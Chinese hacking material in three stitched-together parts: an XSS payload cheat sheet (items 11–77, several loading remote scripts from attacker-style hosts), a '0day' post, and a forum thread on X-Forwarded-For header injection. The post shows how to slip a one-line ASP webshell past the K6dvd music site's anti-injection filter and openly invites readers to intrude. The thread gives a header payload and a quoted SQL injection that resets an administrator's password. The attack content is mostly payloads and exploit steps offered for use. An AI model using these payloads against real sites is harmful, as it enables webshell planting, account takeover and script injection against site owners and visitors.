(11)嵌入式标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(12)嵌入式编码标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(13)嵌入式换行符
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(14)嵌入式回车
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC=”javascript:alert(‘XSS‘)”>
(16)解决限制字符(要求同页面)
<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>
(17)空字符
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
(19)Spaces和meta前的IMG标签
<IMG SRC=” javascript:alert(‘XSS’);”>
(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
(23)双开括号
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26)半开的HTML/JavaScript XSS
<IMG SRC=”javascript:alert(‘XSS’)”
(27)双开角括号
<iframe src=http://3w.org/XSS.html <
(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29)换码过滤的JavaScript
\”;alert(‘XSS’);//
(30)结束Title标签
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
(31)Input Image
<INPUT SRC=”javascript:alert(‘XSS’);”>
(32)BODY Image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
(33)BODY标签
<BODY(‘XSS’)>
(34)IMG Dynsrc
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
(35)IMG Lowsrc
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
(36)BGSOUND
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
(37)STYLE sheet
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
(38)远程样式表
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
(39)List-style-image(列表式)
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
(40)IMG VBscript
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
(41)META链接url
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
(42)Iframe
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
(43)Frame
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
(44)Table
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
(45)TD
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
(46)DIV background-image
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
(48)DIV expression
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
(49)STYLE属性分拆表达
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
(51)STYLE background-image
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
(52)IMG STYLE方式
exppression(alert(“XSS”))’>
(53)STYLE background
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
(54)BASE
<BASE HREF=”javascript:alert(‘XSS’);//”>
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
(56)在flash中使用ActionScrpt可以混进你XSS的代码
a=”get”;
b=”URL(\”";
c=”javascript:”;
d=”alert(‘XSS’);\”)”;
eval_r(a+b+c+d);
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
<HTML xmlns:xss>
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
<xss:xss>XSS</xss:xss>
</HTML>
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
<SCRIPT SRC=””></SCRIPT>
(59)IMG嵌入式命令,可执行任意命令
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
(60)IMG嵌入式命令(a.jpg在同服务器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61)绕符号过滤
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
(62)
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
(63)
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
(64)
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
(65)
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
(66)
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
(67)
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
(68)URL绕行
<A HREF=”http://127.0.0.1/”>XSS</A>
(69)URL编码
<A HREF=”http://3w.org”>XSS</A>
(70)IP十进制
<A HREF=”http://3232235521″>XSS</A>
(71)IP十六进制
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
(72)IP八进制
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
(73)混合编码
<A HREF=”h
tt p://6 6.000146.0×7.147/”">XSS</A>
(74)节省[http:]
<A HREF=”//www.google.com/”>XSS</A>
(75)节省[www]
<A HREF=”http://google.com/”>XSS</A>
(76)绝对点绝对DNS
<A HREF=”http://www.google.com./”>XSS</A>
(77)javascript链接
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
K6dvd 音乐网0day (防注射的尴尬)
很久没看代码了~发表之前,相信应该有很多前辈已经知道这个BUG了!!Ps:虽然我没发现过,也许是太久没关注网络了!呵~~
K6dvd 影视系统是国内不错的音乐发表管理系统!
今天鱼叫我这周内发表些渗透文章供黑客吧交流!~ 本是拒绝的,因为有段时间没做渗透了,所以也没啥可写的!但还是随意的翻了些站 看看能不能弄点菜鸟渗透文章。。。
发现一音乐发布站,就它吧! URL就不写了 目的不再于渗透~呵!
随便找了个带参数的URL 提交了个' 返回如下:
恩,防注射系统!大多搞渗透的朋友应该都见过~
非法操作!系统做了如下记录↓
操作IP:xxx.xxx.xxx.xx
操作时间:2009-5-28 19:33:47
操作页面:/yxplay.asp
提交方式:GET
提交参数:id
提交数据:109446'
呵,还做了IP记录呀~~
随意的试了些普通的渗透思路~由于有防注射系统的阻挡,所以很不如意!于是呼,直接下了套这站点的音乐源码回来看能不能翻个ODAY~于是,就有了此文!!
先看下刚才的防注射系统吧,存在于conn.asp 和sql.asp,部分如下:
dim dbkillSql,killSqlconn,connkillSql
dbkillSql="data/#sql.asp"
'On Error Resume Next
Set killSqlconn = Server.CreateObject("ADODB.Connection")
connkillSql="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(dbkillSql)
killSqlconn.Open connkillSql
创建了个数据库连接!
'--------POST部份------------------
If Request.Form<>"" Then
For Each Fy_Post In Request.Form
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
If WriteSql=True Then
killSqlconn.Execute("insert into 9j455(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','POST','"&Fy_Post&"','"&replace(Request.Form(Fy_Post),"'","''")&"')")
killSqlconn.close
Set killSqlconn = Nothing
End If
Response.Write "<Script Language=JavaScript>alert('快乐视听娱乐网提示你,请不要给本站提交任何非法字符或参数尝试注入!');</Script>"
Response.Write "非法操作!系统做了如下记录↓<br>"
Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
Response.Write "操作时间:"&Now&"<br>"
Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"
Response.Write "提交方式:POST<br>"
Response.Write "提交参数:"&Fy_Post&"<br>"
Response.Write "提交数据:"&Request.Form(Fy_Post)
Response.End
End If
恩,刚才就是alert这个错误消息!
仔细看,发现个有意思的家伙killSqlconn.Execute("insert into 9j455(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','POST','"&Fy_Post&"','"&replace(Request.Form(Fy_Post),"'","''")&"')")
这是正常的记录IP和action类型 以及注射者提交的内容等!!在看看上面的Server.CreateObject("ADODB.Connection") 数据库竟然是ASP。。。那,如果我们提交' <%execute(request("wooden"))%>不就为我们写了一句话小马到#sql.asp么? 别高兴太早,再看这个:
'自定义需要过滤的字串,用 "|" 分隔
Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
fy_in参数里执行了提交类型中包含的关键字! 如果我们提交的内容出现这些关键字的话,那么就无法提交到数据库了!
如果学过正则的话,这个对于JS高手来说根本不算问题,经过反复的改些! 终于,一个可以跳过如上所有检测的一句话木马诞生了~不过是eval - - 哎 没execute报错的那种快感啊!
<script runat=server language=vbscript>eval request(chr(35))</script>
利用方法,在任何的URL参数后面带上 and =><script runat=server language=vbscript>eval request(chr(35))</script>
然后访问data/%23sql.asp 就可以执行一句话小马了:
好了,Oday发布了,大家可以尽情去入侵了,但切记:别搞破坏!特别是挂马者 鄙视~
请教关于HTTP_X_FORWARDED_FOR伪造的问题
http://www.t00ls.net/thread-15177-1-1.html
小弟愚笨,对于HTTP_X_FORWARDED_FOR伪造的问题,在百度哥和GOOGLE姐的帮助下看了半天的资料,还是不懂,特来请教。。。
假设以下是个正常的后台登录页面的抓包
POST /admin/login.asp?action=login HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://127.0.0.1:99/admin/login.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 127.0.0.1:99
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: EDiaryEditor_RUser=1324481743; rtime=0; ltime=1298481309656; cnzz_eid=19758319-1298478159-; AJSTAT_ok_times=1; TENATTQRLEFVOIAJDEKD=MQAAEQCFLLKKNYKKUTOOYJMBVTKWIHXKIHAZRJOR
name=123123312&pass=1232123&code=7XYZ&Submit=%B5%C7+%C2%BC
在这里面,如何构造HTTP_X_FORWARDED_FOR,使之产生注入呢?
=============
另附网络上的一个风讯4.0注入的分析----
存在注入漏洞的是Vote/Vote_Ajax.asp文件,其第48~53行的代码如下。
VisitIP = request.ServerVariables("HTTP_X_FORWARDED_FOR") If VisitIP = "" then VisitIP = request.ServerVariables("REMOTE_ADDR") End If //如果VisitIP不为空,直接就将变量HTTP_X_FORWARDED_FOR提交到数据库中查询了 Set VS_RS = Conn.Execute("Select top 1 VoteTime from FS_VS_Items_Result where TID = "&TID&" and VoteIp='"&VisitIP&"' order by RID desc") //这里明显构成了注入条件
此文件存在的注入漏洞,我们直接伪造就行了。关于HTTP_X_FORWARDED_FOR变量的伪造,我们只需要用NC抓包,然后再相应的修改抓取的数据包再进行提交就可以了。
此漏洞的构造语句:127.0.0.1');update FS_MF_Admin set Admin_Pass_Word=' 49ba59abbe56e057' where id=2--提交成功后,ID为2的管理员的密码就被我们改为了123456了
在这里,“然后再相应的修改抓取的数据包再进行提交就可以了”,这句话的意思是在包中修改HTTP_X_FORWARDED_FOR变量,而正常的抓包中并没有看到有关于HTTP_X_FORWARDED_FOR的变量啊。
我的疑问是,是要在包中另加一句关于HTTP_X_FORWARDED_FOR变量的注入的语句吗?
该如何添加或者进行注入?
就比如如上所说的风讯4.0的那个注入该如何构造?
=====================
在请求的header中加入x-forwarded-for即可,如
POST /admin/login.asp?action=login HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://127.0.0.1:99/admin/login.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 127.0.0.1:99
x-forwarded-for: aa' or ''='
name=123123312&pass=1232123&code=7XYZ&Submit=%B5%C7+%C2%BC
BY toby57